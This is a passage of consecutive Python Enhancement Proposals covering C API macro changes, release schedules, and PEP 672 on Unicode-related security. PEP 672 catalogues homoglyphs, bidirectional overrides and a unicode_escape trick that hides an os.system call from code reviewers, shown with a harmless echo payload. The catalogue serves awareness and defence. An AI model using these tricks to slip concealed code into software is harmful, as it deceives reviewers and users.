On Windows, when Python is built in debug mode by Visual Studio, static
inline functions are not inlined.
On other platforms, ./configure --with-pydebug uses the -Og compiler
option on compilers that support it (including GCC and LLVM Clang).
-Og means “optimize debugging experience”.
Otherwise, the -O0 compiler option is used.
-O0 means “disable most optimizations”.
With GCC 11, gcc -Og can inline static inline functions, whereas
gcc -O0 does not inline static inline functions.
Benchmark of the ./python -m test -j10 command on Python built in
debug mode with gcc -O0 (that is, compiler optimizations,
including inlining, are explicitly disabled):
Macros (PR 29728): 345 sec ± 5 sec
Static inline functions (reference): 360 sec ± 6 sec
Replacing macros with static inline functions makes Python
1.04x slower when the compiler does not inline static inline
functions.
Note that benchmarks should not be run on a Python debug build.
Moreover, using link-time optimization (LTO) and profile-guided optimization
(PGO) is recommended for best performance and reliable benchmarks.
PGO helps the compiler to decide if functions should be inlined or not.
Force inlining
The Py_ALWAYS_INLINE macro can be used to force inlining. This macro
uses __attribute__((always_inline)) with GCC and Clang, and
__forceinline with MSC.
Previous attempts to use Py_ALWAYS_INLINE didn’t show any benefit, and were
abandoned. See for example bpo-45094
“Consider using __forceinline and __attribute__((always_inline)) on
static inline functions (Py_INCREF, Py_TYPE) for debug build”.
When the Py_INCREF() macro was converted to a static inline
function in 2018 (commit),
it was decided not to force inlining. The machine code was analyzed with
multiple C compilers and compiler options, and Py_INCREF() was always
inlined without having to force inlining. The only case where it was not
inlined was the debug build. See discussion in bpo-35059 “Convert Py_INCREF() and
PyObject_INIT() to inlined functions”.
Disabling inlining
On the other side, the Py_NO_INLINE macro can be used to disable
inlining. It can be used to reduce the stack memory usage, or to prevent
inlining on LTO+PGO builds, which generally inline code more aggressively:
see bpo-33720. The
Py_NO_INLINE macro uses __attribute__ ((noinline)) with GCC and
Clang, and __declspec(noinline) with MSC.
This technique is available, though we currently don’t know a concrete
function for which it would be useful.
Note that with macros, it is not possible to disable inlining at all.
Rejected Ideas
Keep macros, but fix some macro issues
Macros are always “inlined” with any C compiler.
The duplication of side effects can be worked around in the caller of
the macro.
People using macros should be considered “consenting adults”. People who
feel unsafe with macros should simply not use them.
These ideas are rejected because macros are error prone, and it is too easy
to miss a macro pitfall when writing and reviewing macro code. Moreover, macros
are harder to read and maintain than functions.
Post History
python-dev mailing list threads:
Version 2 of PEP 670 - Convert macros to functions in the Python C API
(February 2022)
Steering Council reply to PEP 670 – Convert macros to
functions in the Python C API
(February 2022)
PEP 670: Convert macros to functions in the Python C API
(October 2021)
References
bpo-45490:
[C API] PEP 670: Convert macros to functions in the Python C API
(October 2021).
What to do with unsafe macros
(March 2021).
bpo-43502:
[C-API] Convert obvious unsafe macros to static inline functions
(March 2021).
Version History
Version 2:
Stricter policy on not changing argument types and return type.
Better explain why pointer arguments require a cast to not emit new
compiler warnings.
Macros which can be used as l-values are no longer modified by the
PEP.
Macros having multiple return types are no longer modified by the
PEP.
Limited C API version 3.11 no longer casts pointer arguments.
No longer remove return values of macros “which should not have a
return value”.
Add “Macros converted to functions since Python 3.8” section.
Add “Benchmark comparing macros and static inline functions”
section.
Version 1: First public version
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Final | PEP 670 – Convert macros to functions in the Python C API | Standards Track | Macros in the C API will be converted to static inline functions or
regular functions. This will help avoid macro pitfalls in C/C++, and
make the functions usable from other programming languages. |
PEP 672 – Unicode-related Security Considerations for Python
Author:
Petr Viktorin <encukou at gmail.com>
Status:
Active
Type:
Informational
Created:
01-Nov-2021
Post-History:
01-Nov-2021
Table of Contents
Abstract
Introduction
Acknowledgement
Confusing Features
ASCII-only Considerations
Confusables and Typos
Control Characters
Confusable Characters in Identifiers
Confusable Digits
Bidirectional Text
Bidirectional Marks, Embeddings, Overrides and Isolates
Normalizing identifiers
Source Encoding
Open Issues
References
Copyright
Abstract
This document explains possible ways to misuse Unicode to write Python
programs that appear to do something else than they actually do.
This document does not give any recommendations and solutions.
Introduction
Unicode is a system for handling all kinds of written language.
It aims to allow any character from any human language to be
used. Python code may consist of almost all valid Unicode characters.
While this allows programmers from all around the world to express themselves,
it also allows writing code that is potentially confusing to readers.
It is possible to misuse Python’s Unicode-related features to write code that
appears to do something else than what it does.
Evildoers could take advantage of this to trick code reviewers into
accepting malicious code.
The possible issues generally can’t be solved in Python itself without
excessive restrictions of the language.
They should be solved in code editors and review tools
(such as diff displays), by enforcing project-specific policies,
and by raising awareness of individual programmers.
This document purposefully does not give any solutions
or recommendations: it is rather a list of things to keep in mind.
This document is specific to Python.
For general security considerations in Unicode text, see [tr36] and [tr39].
Acknowledgement
Investigation for this document was prompted by CVE-2021-42574,
Trojan Source Attacks, reported by Nicholas Boucher and Ross Anderson,
which focuses on Bidirectional override characters and homoglyphs in a variety
of programming languages.
Confusing Features
This section lists some Unicode-related features that can be surprising
or misusable.
ASCII-only Considerations
ASCII is a subset of Unicode, consisting of the most common symbols, numbers,
Latin letters and control characters.
While issues with the ASCII character set are generally well understood,
the’re presented here to help better understanding of the non-ASCII cases.
Confusables and Typos
Some characters look alike.
Before the age of computers, many mechanical typewriters lacked the keys for
the digits 0 and 1: users typed O (capital o) and l
(lowercase L) instead. Human readers could tell them apart by context only.
In programming languages, however, distinction between digits and letters is
critical – and most fonts designed for programmers make it easy to tell them
apart.
Similarly, in fonts designed for human languages, the uppercase “I” and
lowercase “l” can look similar. Or the letters “rn” may be virtually
indistinguishable from the single letter “m”.
Again, programmers’ fonts make these pairs of confusables
noticeably different.
However, what is “noticeably” different always depends on the context.
Humans tend to ignore details in longer identifiers: the variable name
accessibi1ity_options can still look indistinguishable from
accessibility_options, while they are distinct for the compiler.
The same can be said for plain typos: most humans will not notice the typo in
responsbility_chain_delegate.
Control Characters
Python generally considers all CR (\r), LF (\n), and CR-LF
pairs (\r\n) as an end of line characters.
Most code editors do as well, but there are editors that display “non-native”
line endings as unknown characters (or nothing at all), rather than ending
the line, displaying this example:
# Don't call this function:
fire_the_missiles()
as a harmless comment like:
# Don't call this function:⬛fire_the_missiles()
CPython may treat the control character NUL (\0) as end of input,
but many editors simply skip it, possibly showing code that Python will not
run as a regular part of a file.
Some characters can be used to hide/overwrite other characters when source is
listed in common terminals. For example:
BS (\b, Backspace) moves the cursor back, so the character after it
will overwrite the character before.
CR (\r, carriage return) moves the cursor to the start of line,
subsequent characters overwrite the start of the line.
SUB (\x1A, Ctrl+Z) means “End of text” on Windows. Some programs
(such as type) ignore the rest of the file after it.
ESC (\x1B) commonly initiates escape codes which allow arbitrary
control of the terminal.
Confusable Characters in Identifiers
Python is not limited to ASCII.
It allows characters of all scripts – Latin letters to ancient Egyptian
hieroglyphs – in identifiers (such as variable names).
See PEP 3131 for details and rationale.
Only “letters and numbers” are allowed, so while γάτα is a valid Python
identifier, 🐱 is not. (See Identifiers and keywords for details.)
Non-printing control characters are also not allowed in identifiers.
However, within the allowed set there is a large number of “confusables”.
For example, the uppercase versions of the Latin b, Greek β (Beta), and
Cyrillic в (Ve) often look identical: B, Β and В, respectively.
This allows identifiers that look the same to humans, but not to Python.
For example, all of the following are distinct identifiers:
scope (Latin, ASCII-only)
scоpe (with a Cyrillic о)
scοpe (with a Greek ο)
ѕсоре (all Cyrillic letters)
Additionally, some letters can look like non-letters:
The letter for the Hawaiian ʻokina looks like an apostrophe;
ʻHelloʻ is a Python identifier, not a string.
The East Asian word for ten looks like a plus sign,
so 十= 10 is a complete Python statement. (The “十” is a word: “ten”
rather than “10”.)
Note
The converse also applies – some symbols look like letters – but since
Python does not allow arbitrary symbols in identifiers, this is not an
issue.
Confusable Digits
Numeric literals in Python only use the ASCII digits 0-9 (and non-digits such
as . or e).
However, when numbers are converted from strings, such as in the int and
float constructors or by the str.format method, any decimal digit
can be used. For example ߅ (NKO DIGIT FIVE) or ௫
(TAMIL DIGIT FIVE) work as the digit 5.
Some scripts include digits that look similar to ASCII ones, but have a
different value. For example:
>>> int('৪୨')
42
>>> '{٥}'.format('zero', 'one', 'two', 'three', 'four', 'five')
five
Bidirectional Text
Some scripts, such as Hebrew or Arabic, are written right-to-left.
Phrases in such scripts interact with nearby text in ways that can be
surprising to people who aren’t familiar with these writing systems and their
computer representation.
The exact process is complicated, and explained in Unicode Standard Annex #9,
Unicode Bidirectional Algorithm.
Consider the following code, which assigns a 100-character string to
the variable s:
s = "X" * 100 # "X" is assigned
When the X is replaced by the Hebrew letter א, the line becomes:
s = "א" * 100 # "א" is assigned
This command still assigns a 100-character string to s, but
when displayed as general text following the Bidirectional Algorithm
(e.g. in a browser), it appears as s = "א" followed by a comment.
Other surprising examples include:
In the statement ערך = 23, the variable ערך is set to the integer 23.
In the statement قيمة = ערך, the variable قيمة is set
to the value of ערך.
In the statement قيمة - (ערך ** 2), the value of ערך is squared and
then subtracted from قيمة.
The opening parenthesis is displayed as ).
Bidirectional Marks, Embeddings, Overrides and Isolates
Default reordering rules do not always yield the intended direction of text, so
Unicode provides several ways to alter it.
The most basic are directional marks, which are invisible but affect text
as a left-to-right (or right-to-left) character would.
Continuing with the s = "X" example above, in the next example the X is
replaced by the Latin x followed or preceded by a
right-to-left mark (U+200F). This assigns a 200-character string to s
(100 copies of x interspersed with 100 invisible marks),
but under Unicode rules for general text, it is rendered as s = "x"
followed by an ASCII-only comment:
s = "x" * 100 # "x" is assigned
The directional embedding, override and isolate characters
are also invisible, but affect the ordering of all text after them until either
ended by a dedicated character, or until the end of line.
(Unicode specifies the effect to last until the end of a “paragraph” (see
Unicode Bidirectional Algorithm),
but allows tools to interpret newline characters as paragraph ends
(see Unicode Newline Guidelines). Most code editors and terminals do so.)
These characters essentially allow arbitrary reordering of the text that
follows them. Python only allows them in strings and comments, which does limit
their potential (especially in combination with the fact that Python’s comments
always extend to the end of a line), but it doesn’t render them harmless.
Normalizing identifiers
Python strings are collections of Unicode codepoints, not “characters”.
For reasons like compatibility with earlier encodings, Unicode often has
several ways to encode what is essentially a single “character”.
For example, all these are different ways of writing Å as a Python string,
each of which is unequal to the others.
"\N{LATIN CAPITAL LETTER A WITH RING ABOVE}" (1 codepoint)
"\N{LATIN CAPITAL LETTER A}\N{COMBINING RING ABOVE}" (2 codepoints)
"\N{ANGSTROM SIGN}" (1 codepoint, but different)
For another example, the ligature fi has a dedicated Unicode codepoint,
even though it has the same meaning as the two letters fi.
Also, common letters frequently have several distinct variations.
Unicode provides them for contexts where the difference has some semantic
meaning, like mathematics. For example, some variations of n are:
n (LATIN SMALL LETTER N)
𝐧 (MATHEMATICAL BOLD SMALL N)
𝘯 (MATHEMATICAL SANS-SERIF ITALIC SMALL N)
n (FULLWIDTH LATIN SMALL LETTER N)
ⁿ (SUPERSCRIPT LATIN SMALL LETTER N)
Unicode includes algorithms to normalize variants like these to a single
form, and Python identifiers are normalized.
(There are several normal forms; Python uses NFKC.)
For example, xn and xⁿ are the same identifier in Python:
>>> xⁿ = 8
>>> xn
8
… as is fi and fi, and as are the different ways to encode Å.
This normalization applies only to identifiers, however.
Functions that treat strings as identifiers, such as getattr,
do not perform normalization:
>>> class Test:
... def finalize(self):
... print('OK')
...
>>> Test().finalize()
OK
>>> Test().finalize()
OK
>>> getattr(Test(), 'finalize')
Traceback (most recent call last):
...
AttributeError: 'Test' object has no attribute 'finalize'
This also applies when importing:
import finalization performs normalization, and looks for a file
named finalization.py (and other finalization.* files).
importlib.import_module("finalization") does not normalize,
so it looks for a file named finalization.py.
Some filesystems independently apply normalization and/or case folding.
On some systems, finalization.py, finalization.py and
FINALIZATION.py are three distinct filenames; on others, some or all
of these name the same file.
Source Encoding
The encoding of Python source files is given by a specific regex on the first
two lines of a file, as per Encoding declarations.
This mechanism is very liberal in what it accepts, and thus easy to obfuscate.
This can be misused in combination with Python-specific special-purpose
encodings (see Text Encodings).
For example, with encoding: unicode_escape, characters like
quotes or braces can be hidden in an (f-)string, with many tools (syntax
highlighters, linters, etc.) considering them part of the string.
For example:
# For writing Japanese, you don't need an editor that supports
# UTF-8 source encoding: unicode_escape sequences work just as well.
import os
message = '''
This is "Hello World" in Japanese:
\u3053\u3093\u306b\u3061\u306f\u7f8e\u3057\u3044\u4e16\u754c
This runs `echo WHOA` in your shell:
\u0027\u0027\u0027\u002c\u0028\u006f\u0073\u002e
\u0073\u0079\u0073\u0074\u0065\u006d\u0028
\u0027\u0065\u0063\u0068\u006f\u0020\u0057\u0048\u004f\u0041\u0027
\u0029\u0029\u002c\u0027\u0027\u0027
'''
Here, encoding: unicode_escape in the initial comment is an encoding
declaration. The unicode_escape encoding instructs Python to treat
\u0027 as a single quote (which can start/end a string), \u002c as
a comma (punctuator), etc.
Open Issues
We should probably write and publish:
Recommendations for Text Editors and Code Tools
Recommendations for Programmers and Teams
Possible Improvements in Python
References
[tr36]
Unicode Technical Report #36: Unicode Security Considerations
http://www.unicode.org/reports/tr36/
[tr39]
Unicode® Technical Standard #39: Unicode Security Mechanisms
http://www.unicode.org/reports/tr39/
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Active | PEP 672 – Unicode-related Security Considerations for Python | Informational | This document explains possible ways to misuse Unicode to write Python
programs that appear to do something else than they actually do. |
PEP 674 – Disallow using macros as l-values
Author:
Victor Stinner <vstinner at python.org>
Status:
Deferred
Type:
Standards Track
Created:
30-Nov-2021
Python-Version:
3.12
Table of Contents
Abstract
PEP Deferral
Rationale
Using a macro as a an l-value
CPython nogil fork
HPy project
GraalVM Python
Specification
Disallow using macros as l-values
PyObject and PyVarObject macros
GET macros
AS macros
PyUnicode macros
PyDateTime GET macros
Port C extensions to Python 3.11
PyTuple_GET_ITEM() and PyList_GET_ITEM() are left unchanged
PyDescr_NAME() and PyDescr_TYPE() are left unchanged
Implementation
Py_TYPE() and Py_SIZE() macros
Backwards Compatibility
Statistics
Top 5000 PyPI
Other affected projects
Relationship with the HPy project
The HPy project
The C API is here is stay for a few more years
Rejected Idea: Leave the macros as they are
Macros already modified
Post History
References
Version History
Copyright
Abstract
Disallow using macros as l-values. For example,
Py_TYPE(obj) = new_type now fails with a compiler error.
In practice, the majority of affected projects only have to make two
changes:
Replace Py_TYPE(obj) = new_type
with Py_SET_TYPE(obj, new_type).
Replace Py_SIZE(obj) = new_size
with Py_SET_SIZE(obj, new_size).
PEP Deferral
See SC reply to PEP 674 – Disallow using macros as l-values
(February 2022).
Rationale
Using a macro as a an l-value
In the Python C API, some functions are implemented as macro because
writing a macro is simpler than writing a regular function. If a macro
exposes directly a structure member, it is technically possible to use
this macro to not only get the structure member but also set it.
Example with the Python 3.10 Py_TYPE() macro:
#define Py_TYPE(ob) (((PyObject *)(ob))->ob_type)
This macro can be used as a r-value to get an object type:
type = Py_TYPE(object);
It can also be used as an l-value to set an object type:
Py_TYPE(object) = new_type;
It is also possible to set an object reference count and an object size
using Py_REFCNT() and Py_SIZE() macros.
Setting directly an object attribute relies on the current exact CPython
implementation. Implementing this feature in other Python
implementations can make their C API implementation less efficient.
CPython nogil fork
Sam Gross forked Python 3.9 to remove the GIL: the nogil branch. This fork has no
PyObject.ob_refcnt member, but a more elaborated implementation for
reference counting, and so the Py_REFCNT(obj) = new_refcnt; code
fails with a compiler error.
Merging the nogil fork into the upstream CPython main branch requires
first to fix this C API compatibility issue. It is a concrete example of
a Python optimization blocked indirectly by the C API.
This issue was already fixed in Python 3.10: the Py_REFCNT() macro
has been already modified to disallow using it as an l-value.
These statements are endorsed by Sam Gross (nogil developer).
HPy project
The HPy project is a brand new C API for
Python using only handles and function calls: handles are opaque,
structure members cannot be accessed directly, and pointers cannot be
dereferenced.
Searching and replacing Py_SET_SIZE() is easier and safer than
searching and replacing some strange macro uses of Py_SIZE().
Py_SIZE() can be semi-mechanically replaced by HPy_Length(),
whereas seeing Py_SET_SIZE() would immediately make clear that the
code needs bigger changes in order to be ported to HPy (for example by
using HPyTupleBuilder or HPyListBuilder).
The fewer internal details exposed via macros, the easier it will be for
HPy to provide direct equivalents. Any macro that references
“non-public” interfaces effectively exposes those interfaces publicly.
These statements are endorsed by Antonio Cuni (HPy developer).
GraalVM Python
In GraalVM, when a Python object is accessed by the Python C API, the C API
emulation layer has to wrap the GraalVM objects into wrappers that expose
the internal structure of the CPython structures (PyObject, PyLongObject,
PyTypeObject, etc). This is because when the C code accesses it directly or via
macros, all GraalVM can intercept is a read at the struct offset, which has
to be mapped back to the representation in GraalVM. The smaller the
“effective” number of exposed struct members (by replacing macros with
functions), the simpler GraalVM wrappers can be.
This PEP alone is not enough to get rid of the wrappers in GraalVM, but it
is a step towards this long term goal. GraalVM already supports HPy which is a better
solution in the long term.
These statements are endorsed by Tim Felgentreff (GraalVM Python developer).
Specification
Disallow using macros as l-values
The following 65 macros are modified to disallow using them as l-values.
PyObject and PyVarObject macros
Py_TYPE(): Py_SET_TYPE() must be used instead
Py_SIZE(): Py_SET_SIZE() must be used instead
GET macros
PyByteArray_GET_SIZE()
PyBytes_GET_SIZE()
PyCFunction_GET_CLASS()
PyCFunction_GET_FLAGS()
PyCFunction_GET_FUNCTION()
PyCFunction_GET_SELF()
PyCell_GET()
PyCode_GetNumFree()
PyDict_GET_SIZE()
PyFunction_GET_ANNOTATIONS()
PyFunction_GET_CLOSURE()
PyFunction_GET_CODE()
PyFunction_GET_DEFAULTS()
PyFunction_GET_GLOBALS()
PyFunction_GET_KW_DEFAULTS()
PyFunction_GET_MODULE()
PyHeapType_GET_MEMBERS()
PyInstanceMethod_GET_FUNCTION()
PyList_GET_SIZE()
PyMemoryView_GET_BASE()
PyMemoryView_GET_BUFFER()
PyMethod_GET_FUNCTION()
PyMethod_GET_SELF()
PySet_GET_SIZE()
PyTuple_GET_SIZE()
PyUnicode_GET_DATA_SIZE()
PyUnicode_GET_LENGTH()
PyUnicode_GET_LENGTH()
PyUnicode_GET_SIZE()
PyWeakref_GET_OBJECT()
AS macros
PyByteArray_AS_STRING()
PyBytes_AS_STRING()
PyFloat_AS_DOUBLE()
PyUnicode_AS_DATA()
PyUnicode_AS_UNICODE()
PyUnicode macros
PyUnicode_1BYTE_DATA()
PyUnicode_2BYTE_DATA()
PyUnicode_4BYTE_DATA()
PyUnicode_DATA()
PyUnicode_IS_ASCII()
PyUnicode_IS_COMPACT()
PyUnicode_IS_READY()
PyUnicode_KIND()
PyUnicode_READ()
PyUnicode_READ_CHAR()
PyDateTime GET macros
PyDateTime_DATE_GET_FOLD()
PyDateTime_DATE_GET_HOUR()
PyDateTime_DATE_GET_MICROSECOND()
PyDateTime_DATE_GET_MINUTE()
PyDateTime_DATE_GET_SECOND()
PyDateTime_DATE_GET_TZINFO()
PyDateTime_DELTA_GET_DAYS()
PyDateTime_DELTA_GET_MICROSECONDS()
PyDateTime_DELTA_GET_SECONDS()
PyDateTime_GET_DAY()
PyDateTime_GET_MONTH()
PyDateTime_GET_YEAR()
PyDateTime_TIME_GET_FOLD()
PyDateTime_TIME_GET_HOUR()
PyDateTime_TIME_GET_MICROSECOND()
PyDateTime_TIME_GET_MINUTE()
PyDateTime_TIME_GET_SECOND()
PyDateTime_TIME_GET_TZINFO()
Port C extensions to Python 3.11
In practice, the majority of projects affected by these PEP only have to
make two changes:
Replace Py_TYPE(obj) = new_type
with Py_SET_TYPE(obj, new_type).
Replace Py_SIZE(obj) = new_size
with Py_SET_SIZE(obj, new_size).
The pythoncapi_compat project can be used to
update automatically C extensions: add Python 3.11 support without
losing support with older Python versions. The project provides a header
file which provides Py_SET_REFCNT(), Py_SET_TYPE() and
Py_SET_SIZE() functions to Python 3.8 and older.
PyTuple_GET_ITEM() and PyList_GET_ITEM() are left unchanged
The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are left
unchanged.
The code patterns &PyTuple_GET_ITEM(tuple, 0) and
&PyList_GET_ITEM(list, 0) are still commonly used to get access to
the inner PyObject** array.
Changing these macros is out of the scope of this PEP.
PyDescr_NAME() and PyDescr_TYPE() are left unchanged
The PyDescr_NAME() and PyDescr_TYPE() macros are left unchanged.
These macros give access to PyDescrObject.d_name and
PyDescrObject.d_type members. They can be used as l-values to set
these members.
The SWIG project uses these macros as l-values to set these members. It
would be possible to modify SWIG to prevent setting PyDescrObject
structure members directly, but it is not really worth it since the
PyDescrObject structure is not performance critical and is unlikely
to change soon.
See the bpo-46538 “[C API] Make
the PyDescrObject structure opaque: PyDescr_NAME() and PyDescr_TYPE()”
issue for more details.
Implementation
The implementation is tracked by bpo-45476: [C API] PEP 674: Disallow
using macros as l-values.
Py_TYPE() and Py_SIZE() macros
In May 2020, the Py_TYPE() and Py_SIZE() macros have been
modified to disallow using them as l-values (Py_TYPE,
Py_SIZE).
In November 2020, the change was reverted,
since it broke too many third party projects.
In June 2021, once most third party projects were updated, a second
attempt
was done, but had to be reverted again
, since it broke test_exceptions on Windows.
In September 2021, once test_exceptions has been fixed,
Py_TYPE() and Py_SIZE() were finally changed.
In November 2021, this backward incompatible change got a
Steering Council exception.
In October 2022, Python 3.11 got released with Py_TYPE() and Py_SIZE()
incompatible changes.
Backwards Compatibility
The proposed C API changes are backward incompatible on purpose.
In practice, only Py_TYPE() and Py_SIZE() macros are used as
l-values.
This change does not follow the PEP 387 deprecation process. There is
no known way to emit a deprecation warning only when a macro is used as
an l-value, but not when it’s used differently (ex: as a r-value).
The following 4 macros are left unchanged to reduce the number of
affected projects: PyDescr_NAME(), PyDescr_TYPE(),
PyList_GET_ITEM() and PyTuple_GET_ITEM().
Statistics
In total (projects on PyPI and not on PyPI), 34 projects are known to be
affected by this PEP:
16 projects (47%) are already fixed
18 projects (53%) are not fixed yet
(pending fix or have to regenerate their Cython code)
On September 1, 2022, the PEP affects 18 projects (0.4%) of the top 5000
PyPI projects:
15 projects (0.3%) have to regenerate their Cython code
3 projects (0.1%) have a pending fix
Top 5000 PyPI
Projects with a pending fix (3):
datatable (1.0.0):
fixed
guppy3 (3.1.2):
fixed
scipy (1.9.3): need to update boost python
Moreover, 15 projects have to regenerate their Cython code.
Projects released with a fix (12):
bitarray (1.6.2):
commit
Cython (0.29.20): commit
immutables (0.15):
commit
mercurial (5.7):
commit,
bug report
mypy (v0.930):
commit
numpy (1.22.1):
commit,
commit 2
pycurl (7.44.1):
commit
PyGObject (3.42.0)
pyside2 (5.15.1):
bug report
python-snappy (0.6.1):
fixed
recordclass (0.17.2):
fixed
zstd (1.5.0.3):
commit
There are also two backport projects which are affected by this PEP:
pickle5 (0.0.12): backport for Python <= 3.7
pysha3 (1.0.2): backport for Python <= 3.5
They must not be used and cannot be used on Python 3.11.
Other affected projects
Other projects released with a fix (4):
boost (1.78.0):
commit
breezy (3.2.1):
bug report
duplicity (0.8.18):
commit
gobject-introspection (1.70.0):
MR
Relationship with the HPy project
The HPy project
The hope with the HPy project is to provide a C API that is close
to the original API—to make porting easy—and have it perform as close to
the existing API as possible. At the same time, HPy is sufficiently
removed to be a good “C extension API” (as opposed to a stable subset of
the CPython implementation API) that does not leak implementation
details. To ensure this latter property, the HPy project tries to
develop everything in parallel for CPython, PyPy, and GraalVM Python.
HPy is still evolving very fast. Issues are still being solved while
migrating NumPy, and work has begun on adding support for HPy to Cython. Work on
pybind11 is starting soon. Tim Felgentreff believes by the time HPy has
these users of the existing C API working, HPy should be in a state
where it is generally useful and can be deemed stable enough that
further development can follow a more stable process.
In the long run the HPy project would like to become a promoted API to
write Python C extensions.
The HPy project is a good solution for the long term. It has the
advantage of being developed outside Python and it doesn’t require any C
API change.
The C API is here is stay for a few more years
The first concern about HPy is that right now, HPy is not mature nor
widely used, and CPython still has to continue supporting a large amount
of C extensions which are not likely to be ported to HPy soon.
The second concern is the inability to evolve CPython internals to
implement new optimizations, and the inefficient implementation of the
current C API in PyPy, GraalPython, etc. Sadly, HPy will only solve
these problems when most C extensions will be fully ported to HPy:
when it will become reasonable to consider dropping the “legacy” Python
C API.
While porting a C extension to HPy can be done incrementally on CPython,
it requires to modify a lot of code and takes time. Porting most C
extensions to HPy is expected to take a few years.
This PEP proposes to make the C API “less bad” by fixing one problem
which is clearily identified as causing practical issues: macros used as
l-values. This PEP only requires updating a minority of C
extensions, and usually only a few lines need to be changed in impacted
extensions.
For example, NumPy 1.22 is made of 307,300 lines of C code, and adapting
NumPy to the this PEP only modified 11 lines (use Py_SET_TYPE and
Py_SET_SIZE) and adding 4 lines (to define Py_SET_TYPE and Py_SET_SIZE
for Python 3.8 and older). The beginnings of the NumPy port to HPy
already required modifying more lines than that.
Right now, it’s hard to bet which approach is the best: fixing the
current C API, or focusing on HPy. It would be risky to only focus on
HPy.
Rejected Idea: Leave the macros as they are
The documentation of each function can discourage developers to use
macros to modify Python objects.
If these is a need to make an assignment, a setter function can be added
and the macro documentation can require to use the setter function. For
example, a Py_SET_TYPE() function has been added to Python 3.9 and
the Py_TYPE() documentation now requires to use the
Py_SET_TYPE() function to set an object type.
If developers use macros as an l-value, it’s their responsibility when
their code breaks, not Python’s responsibility. We are operating under
the consenting adults principle: we expect users of the Python C API to
use it as documented and expect them to take care of the fallout, if
things break when they don’t.
This idea was rejected because only few developers read the
documentation, and only a minority is tracking changes of the Python C
API documentation. The majority of developers are only using CPython and
so are not aware of compatibility issues with other Python
implementations.
Moreover, continuing to allow using macros as an l-value does not help
the HPy project, and leaves the burden of emulating them on GraalVM’s
Python implementation.
Macros already modified
The following C API macros have already been modified to disallow using
them as l-value:
PyCell_SET()
PyList_SET_ITEM()
PyTuple_SET_ITEM()
Py_REFCNT() (Python 3.10): Py_SET_REFCNT() must be used
_PyGCHead_SET_FINALIZED()
_PyGCHead_SET_NEXT()
asdl_seq_GET()
asdl_seq_GET_UNTYPED()
asdl_seq_LEN()
asdl_seq_SET()
asdl_seq_SET_UNTYPED()
For example, PyList_SET_ITEM(list, 0, item) < 0 now fails with a
compiler error as expected.
Post History
PEP 674 “Disallow using macros as l-values” and Python 3.11 (August 18, 2022)
SC reply to PEP 674 – Disallow using macros as l-values (February 22, 2022)
PEP 674: Disallow using macros as l-value (version 2)
(Jan 18, 2022)
PEP 674: Disallow using macros as l-value
(Nov 30, 2021)
References
Python C API: Add functions to access PyObject (October
2021) article by Victor Stinner
[capi-sig] Py_TYPE() and Py_SIZE() become static inline functions
(September 2021)
[C API] Avoid accessing PyObject and PyVarObject members directly: add Py_SET_TYPE() and Py_IS_TYPE(), disallow Py_TYPE(obj)=type (February 2020)
bpo-30459: PyList_SET_ITEM could be safer (May 2017)
Version History
Version 3: No longer change PyDescr_TYPE() and PyDescr_NAME() macros
Version 2: Add “Relationship with the HPy project” section, remove
the PyPy section
Version 1: First public version
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Deferred | PEP 674 – Disallow using macros as l-values | Standards Track | Disallow using macros as l-values. For example,
Py_TYPE(obj) = new_type now fails with a compiler error. |
PEP 693 – Python 3.12 Release Schedule
Author:
Thomas Wouters <thomas at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
24-May-2022
Python-Version:
3.12
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.12.0 schedule
Bugfix releases
Source-only security fix releases
3.12 Lifespan
Features for 3.12
Copyright
Abstract
This document describes the development and release schedule for
Python 3.12.
Release Manager and Crew
3.12 Release Manager: Thomas Wouters
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.12.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.12 development begins: Sunday, 2022-05-08
3.12.0 alpha 1: Monday, 2022-10-24
3.12.0 alpha 2: Monday, 2022-11-14
3.12.0 alpha 3: Tuesday, 2022-12-06
3.12.0 alpha 4: Tuesday, 2023-01-10
3.12.0 alpha 5: Tuesday, 2023-02-07
3.12.0 alpha 6: Tuesday, 2023-03-07
3.12.0 alpha 7: Tuesday, 2023-04-04
3.12.0 beta 1: Monday, 2023-05-22
(No new features beyond this point.)
3.12.0 beta 2: Tuesday, 2023-06-06
3.12.0 beta 3: Monday, 2023-06-19
3.12.0 beta 4: Tuesday, 2023-07-11
3.12.0 candidate 1: Sunday, 2023-08-06
3.12.0 candidate 2: Wednesday, 2023-09-06
3.12.0 candidate 3: Tuesday, 2023-09-19
3.12.0 final: Monday, 2023-10-02
Bugfix releases
Actual:
3.12.1: Thursday, 2023-12-07
Expected:
3.12.2: Tuesday, 2024-02-06
3.12.3: Tuesday, 2024-04-09
3.12.4: Tuesday, 2024-06-04
3.12.5: Tuesday, 2024-08-06
3.12.6: Tuesday, 2024-10-01
3.12.7: Tuesday, 2024-12-03
3.12.8: Tuesday, 2025-02-04
3.12.9: Tuesday, 2025-04-08
Source-only security fix releases
Provided irregularly on an as-needed basis until October 2028.
3.12 Lifespan
3.12 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.13.0 final,
the ninth and final 3.12 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.12.0 final, so until approximately
October 2028.
Features for 3.12
New features can be found in What’s New In Python 3.12.
Copyright
This document is placed in the public domain or under the CC0-1.0-Universal
license, whichever is more permissive.
| Active | PEP 693 – Python 3.12 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.12. |
PEP 719 – Python 3.13 Release Schedule
Author:
Thomas Wouters <thomas at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
26-May-2023
Python-Version:
3.13
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.13.0 schedule
3.13 Lifespan
Copyright
Abstract
This document describes the development and release schedule for
Python 3.13.
Release Manager and Crew
3.13 Release Manager: Thomas Wouters
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.13.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.13 development begins: Monday, 2023-05-22
